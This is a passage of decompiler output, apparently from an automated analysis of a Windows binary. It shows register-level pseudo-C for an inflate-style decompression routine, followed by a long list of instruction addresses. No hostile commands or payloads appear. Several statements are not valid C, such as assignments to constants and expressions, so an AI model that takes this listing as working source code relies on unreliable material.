											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00407272( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00407272(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                                                0x00406a9b
                                                                                0x00406a9b
                                                                                0x00406a9b
                                                                                0x00406a9b
                                                                                0x00406a9b
                                                                                0x00406a9f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406aa5
                                                                                0x00406aa5
                                                                                0x00406aa8
                                                                                0x00406aab
                                                                                0x00406ab0
                                                                                0x00406ab2
                                                                                0x00406ab5
                                                                                0x00406ab8
                                                                                0x00406abb
                                                                                0x00406abb
                                                                                0x00406abe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ac0
                                                                                0x00406ac0
                                                                                0x00406ac3
                                                                                0x00406ac8
                                                                                0x00406aca
                                                                                0x00406acd
                                                                                0x00406ad3
                                                                                0x00406832
                                                                                0x00406832
                                                                                0x00406835
                                                                                0x0040683b
                                                                                0x00406841
                                                                                0x0040684a
                                                                                0x00406850
                                                                                0x00406853
                                                                                0x0040685a
                                                                                0x0040685f
                                                                                0x00406865
                                                                                0x00406870
                                                                                0x00406870
                                                                                0x00406ad9
                                                                                0x00406ad9
                                                                                0x00406ae3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ae9
                                                                                0x00406ae9
                                                                                0x00406aed
                                                                                0x00406af0
                                                                                0x00406af0
                                                                                0x00406af4
                                                                                0x00406afa
                                                                                0x00406afa
                                                                                0x00406afd
                                                                                0x00406b00
                                                                                0x00406b06
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406b08
                                                                                0x00406b2a
                                                                                0x00406b2a
                                                                                0x00406b2d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406b0a
                                                                                0x00406b0e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406b14
                                                                                0x00406b14
                                                                                0x00406b17
                                                                                0x00406b1a
                                                                                0x00406b1f
                                                                                0x00406b21
                                                                                0x00406b24
                                                                                0x00406b27
                                                                                0x00406b27
                                                                                0x00406b2f
                                                                                0x00406b2f
                                                                                0x00406b35
                                                                                0x00406b38
                                                                                0x00406b3b
                                                                                0x00406b3b
                                                                                0x00406b42
                                                                                0x00406b46
                                                                                0x00406b4a
                                                                                0x00406b4d
                                                                                0x00406b50
                                                                                0x00406b56
                                                                                0x00406b5b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406b5d
                                                                                0x00406b71
                                                                                0x00406b71
                                                                                0x00406b75
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406b5f
                                                                                0x00406b62
                                                                                0x00406b62
                                                                                0x00406b69
                                                                                0x00406b6e
                                                                                0x00406b6e
                                                                                0x00406b6e
                                                                                0x00406b77
                                                                                0x00406b77
                                                                                0x00406b7a
                                                                                0x00406b88
                                                                                0x00406b8e
                                                                                0x00406b93
                                                                                0x00406b99
                                                                                0x00406b9f
                                                                                0x00406ba5
                                                                                0x00406bac
                                                                                0x00406bc0
                                                                                0x00406bc0
                                                                                0x0040718f
                                                                                0x0040718f
                                                                                0x0040718f
                                                                                0x00407194
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004067cc
                                                                                0x004067cc
                                                                                0x00000000
                                                                                0x00406dc7
                                                                                0x00406dc7
                                                                                0x00406dcb
                                                                                0x00406dce
                                                                                0x00406dd1
                                                                                0x00406dd4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406dda
                                                                                0x00406dda
                                                                                0x00406dff
                                                                                0x00406dff
                                                                                0x00406dff
                                                                                0x00406e01
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ddf
                                                                                0x00406ddf
                                                                                0x00406de3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406de9
                                                                                0x00406de9
                                                                                0x00406dec
                                                                                0x00406def
                                                                                0x00406df2
                                                                                0x00406df4
                                                                                0x00406df6
                                                                                0x00406df9
                                                                                0x00406dfc
                                                                                0x00406dfc
                                                                                0x00406dfc
                                                                                0x00406e03
                                                                                0x00406e03
                                                                                0x00406e0b
                                                                                0x00406e0e
                                                                                0x00406e11
                                                                                0x00406e14
                                                                                0x00406e18
                                                                                0x00406e1b
                                                                                0x00406e1d
                                                                                0x00406e20
                                                                                0x00406e22
                                                                                0x00406e36
                                                                                0x00406e36
                                                                                0x00406e39
                                                                                0x00406e53
                                                                                0x00406e53
                                                                                0x00406e56
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406e5c
                                                                                0x00406e5c
                                                                                0x00406e5f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406e65
                                                                                0x00406e65
                                                                                0x00000000
                                                                                0x00406e65
                                                                                0x00406e3b
                                                                                0x00406e3e
                                                                                0x00406e45
                                                                                0x00406e48
                                                                                0x00000000
                                                                                0x00406e48
                                                                                0x00406e24
                                                                                0x00406e28
                                                                                0x00406e2b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406e70
                                                                                0x00406e70
                                                                                0x00406e95
                                                                                0x00406e95
                                                                                0x00406e95
                                                                                0x00406e97
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406e75
                                                                                0x00406e75
                                                                                0x00406e79
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406e7f
                                                                                0x00406e7f
                                                                                0x00406e82
                                                                                0x00406e85
                                                                                0x00406e88
                                                                                0x00406e8a
                                                                                0x00406e8c
                                                                                0x00406e8f
                                                                                0x00406e92
                                                                                0x00406e92
                                                                                0x00406e92
                                                                                0x00406e99
                                                                                0x00406ea1
                                                                                0x00406ea4
                                                                                0x00406ea7
                                                                                0x00406ea9
                                                                                0x00406eac
                                                                                0x00406eac
                                                                                0x00406eae
                                                                                0x00406eb2
                                                                                0x00406eb5
                                                                                0x00406eb8
                                                                                0x00406ebb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ec1
                                                                                0x00406ec1
                                                                                0x00406ee6
                                                                                0x00406ee6
                                                                                0x00406ee6
                                                                                0x00406ee8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ec6
                                                                                0x00406ec6
                                                                                0x00406eca
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ed0
                                                                                0x00406ed0
                                                                                0x00406ed3
                                                                                0x00406ed6
                                                                                0x00406ed9
                                                                                0x00406edb
                                                                                0x00406edd
                                                                                0x00406ee0
                                                                                0x00406ee3
                                                                                0x00406ee3
                                                                                0x00406ee3
                                                                                0x00406eea
                                                                                0x00406eea
                                                                                0x00406ef2
                                                                                0x00406ef5
                                                                                0x00406ef8
                                                                                0x00406efb
                                                                                0x00406eff
                                                                                0x00406f02
                                                                                0x00406f04
                                                                                0x00406f07
                                                                                0x00406f0a
                                                                                0x00406f24
                                                                                0x00406f24
                                                                                0x00406f27
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406f2d
                                                                                0x00406f2d
                                                                                0x00406f30
                                                                                0x00406f37
                                                                                0x00000000
                                                                                0x00406f37
                                                                                0x00406f0c
                                                                                0x00406f0f
                                                                                0x00406f16
                                                                                0x00406f19
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406f3f
                                                                                0x00406f3f
                                                                                0x00406f64
                                                                                0x00406f64
                                                                                0x00406f64
                                                                                0x00406f66
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406f44
                                                                                0x00406f44
                                                                                0x00406f48
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406f4e
                                                                                0x00406f4e
                                                                                0x00406f51
                                                                                0x00406f54
                                                                                0x00406f57
                                                                                0x00406f59
                                                                                0x00406f5b
                                                                                0x00406f5e
                                                                                0x00406f61
                                                                                0x00406f61
                                                                                0x00406f61
                                                                                0x00406f68
                                                                                0x00406f70
                                                                                0x00406f73
                                                                                0x00406f76
                                                                                0x00406f78
                                                                                0x00406f7b
                                                                                0x00406f7b
                                                                                0x00406f7d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406f83
                                                                                0x00406f83
                                                                                0x00406f86
                                                                                0x00406f8b
                                                                                0x00406f8d
                                                                                0x00406f93
                                                                                0x00406f95
                                                                                0x00406faa
                                                                                0x00406fac
                                                                                0x00406fac
                                                                                0x00406f97
                                                                                0x00406f9d
                                                                                0x00406f9f
                                                                                0x00406fa1
                                                                                0x00406fa1
                                                                                0x00406fae
                                                                                0x00406fb2
                                                                                0x00406fb5
                                                                                0x00406fbb
                                                                                0x00406fbb
                                                                                0x00406fbe
                                                                                0x00406fbe
                                                                                0x00406fbe
                                                                                0x00406fc0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406fc6
                                                                                0x00406fc6
                                                                                0x00406fcc
                                                                                0x00406fce
                                                                                0x00406ff3
                                                                                0x00406ff6
                                                                                0x00406ffc
                                                                                0x00407001
                                                                                0x00407007
                                                                                0x0040700d
                                                                                0x0040700f
                                                                                0x00407012
                                                                                0x0040701b
                                                                                0x00407021
                                                                                0x00407021
                                                                                0x00407014
                                                                                0x00407016
                                                                                0x00407018
                                                                                0x00407018
                                                                                0x00407023
                                                                                0x00407029
                                                                                0x0040702b
                                                                                0x0040702e
                                                                                0x00407030
                                                                                0x00407036
                                                                                0x00407038
                                                                                0x0040703a
                                                                                0x0040703c
                                                                                0x0040703e
                                                                                0x00407041
                                                                                0x0040704a
                                                                                0x0040704d
                                                                                0x0040704d
                                                                                0x00407043
                                                                                0x00407043
                                                                                0x00407046
                                                                                0x00407046
                                                                                0x00407041
                                                                                0x00407038
                                                                                0x0040704f
                                                                                0x00407051
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407051
                                                                                0x00406fd0
                                                                                0x00406fd0
                                                                                0x00406fd6
                                                                                0x00406fdc
                                                                                0x00406fde
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406fe0
                                                                                0x00406fe0
                                                                                0x00406fe2
                                                                                0x00406fe4
                                                                                0x00406fed
                                                                                0x00406fed
                                                                                0x00406fe6
                                                                                0x00406fe6
                                                                                0x00406fe9
                                                                                0x00406fe9
                                                                                0x00406fef
                                                                                0x00406ff1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407057
                                                                                0x00407057
                                                                                0x0040705c
                                                                                0x0040705e
                                                                                0x0040705f
                                                                                0x00407060
                                                                                0x00407061
                                                                                0x00407067
                                                                                0x0040706a
                                                                                0x0040706d
                                                                                0x00407070
                                                                                0x00407072
                                                                                0x00407078
                                                                                0x00407078
                                                                                0x0040707b
                                                                                0x0040707b
                                                                                0x0040707b
                                                                                0x0040707b
                                                                                0x00407084
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407089
                                                                                0x00407089
                                                                                0x0040708c
                                                                                0x0040708f
                                                                                0x00407091
                                                                                0x00407128
                                                                                0x00407128
                                                                                0x0040712b
                                                                                0x0040712d
                                                                                0x0040712e
                                                                                0x0040712f
                                                                                0x00407132
                                                                                0x00000000
                                                                                0x00407132
                                                                                0x00407097
                                                                                0x00407097
                                                                                0x0040709d
                                                                                0x0040709f
                                                                                0x004070c4
                                                                                0x004070c7
                                                                                0x004070cd
                                                                                0x004070d2
                                                                                0x004070d8
                                                                                0x004070de
                                                                                0x004070e0
                                                                                0x004070e3
                                                                                0x004070ec
                                                                                0x004070f2
                                                                                0x004070f2
                                                                                0x004070e5
                                                                                0x004070e7
                                                                                0x004070e9
                                                                                0x004070e9
                                                                                0x004070f4
                                                                                0x004070fa
                                                                                0x004070fc
                                                                                0x004070ff
                                                                                0x00407101
                                                                                0x00407107
                                                                                0x00407109
                                                                                0x0040710b
                                                                                0x0040710d
                                                                                0x0040710f
                                                                                0x00407112
                                                                                0x0040711b
                                                                                0x0040711e
                                                                                0x0040711e
                                                                                0x00407114
                                                                                0x00407114
                                                                                0x00407117
                                                                                0x00407117
                                                                                0x00407112
                                                                                0x00407109
                                                                                0x00407120
                                                                                0x00407122
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407122
                                                                                0x004070a1
                                                                                0x004070a1
                                                                                0x004070a7
                                                                                0x004070ad
                                                                                0x004070af
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004070b1
                                                                                0x004070b1
                                                                                0x004070b3
                                                                                0x004070b5
                                                                                0x004070bc
                                                                                0x004070bc
                                                                                0x004070be
                                                                                0x004070b7
                                                                                0x004070b7
                                                                                0x004070b9
                                                                                0x004070b9
                                                                                0x004070c0
                                                                                0x004070c2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040713a
                                                                                0x0040713a
                                                                                0x0040713d
                                                                                0x0040713f
                                                                                0x00407142
                                                                                0x00407145
                                                                                0x00407145
                                                                                0x00407145
                                                                                0x00407145
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004067f3
                                                                                0x004067d7
                                                                                0x00000000
                                                                                0x004067dd
                                                                                0x004067e0
                                                                                0x004067ea
                                                                                0x004067ed
                                                                                0x004067f0
                                                                                0x00000000
                                                                                0x004067f0
                                                                                0x004067d7
                                                                                0x004067fb
                                                                                0x004067fe
                                                                                0x00406802
                                                                                0x0040680c
                                                                                0x00406816
                                                                                0x00406819
                                                                                0x0040681f
                                                                                0x00406953
                                                                                0x00406955
                                                                                0x0040695b
                                                                                0x0040695e
                                                                                0x00406961
                                                                                0x00000000
                                                                                0x00406961
                                                                                0x00406825
                                                                                0x00406825
                                                                                0x00406826
                                                                                0x0040687e
                                                                                0x0040687e
                                                                                0x00406885
                                                                                0x0040692b
                                                                                0x0040692b
                                                                                0x00406930
                                                                                0x00406933
                                                                                0x00406938
                                                                                0x0040693b
                                                                                0x00406940
                                                                                0x00406943
                                                                                0x00406948
                                                                                0x0040694b
                                                                                0x0040694b
                                                                                0x00000000
                                                                                0x0040688b
                                                                                0x0040688b
                                                                                0x0040688b
                                                                                0x0040688b
                                                                                0x0040688f
                                                                                0x0040688f
                                                                                0x004068b1
                                                                                0x004068b4
                                                                                0x004068b6
                                                                                0x004068b9
                                                                                0x004068be
                                                                                0x00406894
                                                                                0x00406894
                                                                                0x00406899
                                                                                0x0040689b
                                                                                0x0040689d
                                                                                0x004068a2
                                                                                0x004068a8
                                                                                0x004068ad
                                                                                0x004068af
                                                                                0x004068af
                                                                                0x004068a4
                                                                                0x004068a4
                                                                                0x004068a4
                                                                                0x004068a2
                                                                                0x00000000
                                                                                0x004068c0
                                                                                0x004068ed
                                                                                0x004068f2
                                                                                0x004068f4
                                                                                0x004068f5
                                                                                0x004068f7
                                                                                0x004068f8
                                                                                0x004068f8
                                                                                0x004068f8
                                                                                0x00406920
                                                                                0x00406925
                                                                                0x00406925
                                                                                0x00000000
                                                                                0x00406925
                                                                                0x004068be
                                                                                0x00406885
                                                                                0x00406828
                                                                                0x00406828
                                                                                0x00406829
                                                                                0x00406873
                                                                                0x00000000
                                                                                0x00406873
                                                                                0x0040682b
                                                                                0x0040682c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406988
                                                                                0x00406988
                                                                                0x00406988
                                                                                0x0040698b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406968
                                                                                0x00406968
                                                                                0x0040696c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406972
                                                                                0x00406972
                                                                                0x00406975
                                                                                0x00406978
                                                                                0x0040697d
                                                                                0x0040697f
                                                                                0x00406982
                                                                                0x00406985
                                                                                0x00406985
                                                                                0x00406985
                                                                                0x0040698d
                                                                                0x0040698d
                                                                                0x00406990
                                                                                0x00406992
                                                                                0x00406997
                                                                                0x0040699a
                                                                                0x0040699c
                                                                                0x0040699f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004069a5
                                                                                0x004069a5
                                                                                0x004069a7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004069ad
                                                                                0x004069ad
                                                                                0x004069b1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004069b7
                                                                                0x004069b7
                                                                                0x004069ba
                                                                                0x004069bc
                                                                                0x00406a5a
                                                                                0x00406a5a
                                                                                0x00406a5d
                                                                                0x00406a5f
                                                                                0x00406a5f
                                                                                0x00406a62
                                                                                0x00406a65
                                                                                0x00406a67
                                                                                0x00406a69
                                                                                0x00406a6b
                                                                                0x00406a6b
                                                                                0x00406a74
                                                                                0x00406a79
                                                                                0x00406a7c
                                                                                0x00406a7f
                                                                                0x00406a82
                                                                                0x00406a85
                                                                                0x00406a85
                                                                                0x00406a85
                                                                                0x00406a88
                                                                                0x00406a8e
                                                                                0x00406a8e
                                                                                0x00406a94
                                                                                0x00406a94
                                                                                0x00406a94
                                                                                0x00000000
                                                                                0x00406a88
                                                                                0x004069c2
                                                                                0x004069c2
                                                                                0x004069c8
                                                                                0x004069cb
                                                                                0x004069cd
                                                                                0x004069f8
                                                                                0x004069fb
                                                                                0x00406a01
                                                                                0x00406a06
                                                                                0x00406a0c
                                                                                0x00406a12
                                                                                0x00406a14
                                                                                0x00406a17
                                                                                0x00406a20
                                                                                0x00406a26
                                                                                0x00406a26
                                                                                0x00406a19
                                                                                0x00406a1b
                                                                                0x00406a1d
                                                                                0x00406a1d
                                                                                0x00406a28
                                                                                0x00406a2e
                                                                                0x00406a31
                                                                                0x00406a33
                                                                                0x00406a35
                                                                                0x00406a3b
                                                                                0x00406a3d
                                                                                0x00406a3f
                                                                                0x00406a42
                                                                                0x00406a4b
                                                                                0x00406a4b
                                                                                0x00406a4d
                                                                                0x00406a44
                                                                                0x00406a44
                                                                                0x00406a47
                                                                                0x00406a47
                                                                                0x00406a4f
                                                                                0x00406a4f
                                                                                0x00406a3d
                                                                                0x00406a52
                                                                                0x00406a54
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406a54
                                                                                0x004069cf
                                                                                0x004069cf
                                                                                0x004069d5
                                                                                0x004069db
                                                                                0x004069dd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004069df
                                                                                0x004069df
                                                                                0x004069e1
                                                                                0x004069e3
                                                                                0x004069e6
                                                                                0x004069ed
                                                                                0x004069ed
                                                                                0x004069ef
                                                                                0x004069e8
                                                                                0x004069e8
                                                                                0x004069ea
                                                                                0x004069ea
                                                                                0x004069f1
                                                                                0x004069f3
                                                                                0x004069f6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406afa
                                                                                0x00406afd
                                                                                0x00406b00
                                                                                0x00406b06
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406cdd
                                                                                0x00406cdd
                                                                                0x00406cdd
                                                                                0x00406ce0
                                                                                0x00406ce3
                                                                                0x00406ce5
                                                                                0x00406ce8
                                                                                0x00406cee
                                                                                0x00406cf5
                                                                                0x00406cf7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406bcb
                                                                                0x00406bcb
                                                                                0x00406bf3
                                                                                0x00406bf3
                                                                                0x00406bf3
                                                                                0x00406bf5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406bd3
                                                                                0x00406bd3
                                                                                0x00406bd7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406bdd
                                                                                0x00406bdd
                                                                                0x00406be0
                                                                                0x00406be3
                                                                                0x00406be6
                                                                                0x00406be8
                                                                                0x00406bea
                                                                                0x00406bed
                                                                                0x00406bf0
                                                                                0x00406bf0
                                                                                0x00406bf0
                                                                                0x00406bf7
                                                                                0x00406bf7
                                                                                0x00406bff
                                                                                0x00406c02
                                                                                0x00406c08
                                                                                0x00406c0b
                                                                                0x00406c0f
                                                                                0x00406c13
                                                                                0x00406c16
                                                                                0x00406c19
                                                                                0x00406c31
                                                                                0x00406c31
                                                                                0x00406c34
                                                                                0x00406c42
                                                                                0x00406c45
                                                                                0x00406c36
                                                                                0x00406c36
                                                                                0x00406c38
                                                                                0x00406c3f
                                                                                0x00406c3f
                                                                                0x00406c6e
                                                                                0x00406c6e
                                                                                0x00406c6e
                                                                                0x00406c71
                                                                                0x00406c73
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406c4e
                                                                                0x00406c4e
                                                                                0x00406c52
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406c58
                                                                                0x00406c58
                                                                                0x00406c5b
                                                                                0x00406c5e
                                                                                0x00406c61
                                                                                0x00406c63
                                                                                0x00406c65
                                                                                0x00406c68
                                                                                0x00406c6b
                                                                                0x00406c6b
                                                                                0x00406c6b
                                                                                0x00406c75
                                                                                0x00406c75
                                                                                0x00406c77
                                                                                0x00406c79
                                                                                0x00406c84
                                                                                0x00406c87
                                                                                0x00406c8a
                                                                                0x00406c8c
                                                                                0x00406c8e
                                                                                0x00406c90
                                                                                0x00406c93
                                                                                0x00406c96
                                                                                0x00406c9b
                                                                                0x00406c9e
                                                                                0x00406ca1
                                                                                0x00406ca4
                                                                                0x00406cab
                                                                                0x00406cae
                                                                                0x00406cb0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406cb6
                                                                                0x00406cb6
                                                                                0x00406cba
                                                                                0x00406ccb
                                                                                0x00406ccb
                                                                                0x00406ccb
                                                                                0x00406ccd
                                                                                0x00406ccd
                                                                                0x00406cd1
                                                                                0x00406cd1
                                                                                0x00406cd1
                                                                                0x00406cd3
                                                                                0x00406cd4
                                                                                0x00406cd7
                                                                                0x00406cd7
                                                                                0x00406cd7
                                                                                0x00406cda
                                                                                0x00000000
                                                                                0x00406cda
                                                                                0x00406cbc
                                                                                0x00406cbc
                                                                                0x00406cbf
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406cc5
                                                                                0x00406cc5
                                                                                0x00000000
                                                                                0x00406cc5
                                                                                0x00406c1b
                                                                                0x00406c1b
                                                                                0x00406c1d
                                                                                0x00406c1f
                                                                                0x00406c22
                                                                                0x00406c25
                                                                                0x00406c29
                                                                                0x00406c29
                                                                                0x00406cfd
                                                                                0x00406cfd
                                                                                0x00406d00
                                                                                0x00406d07
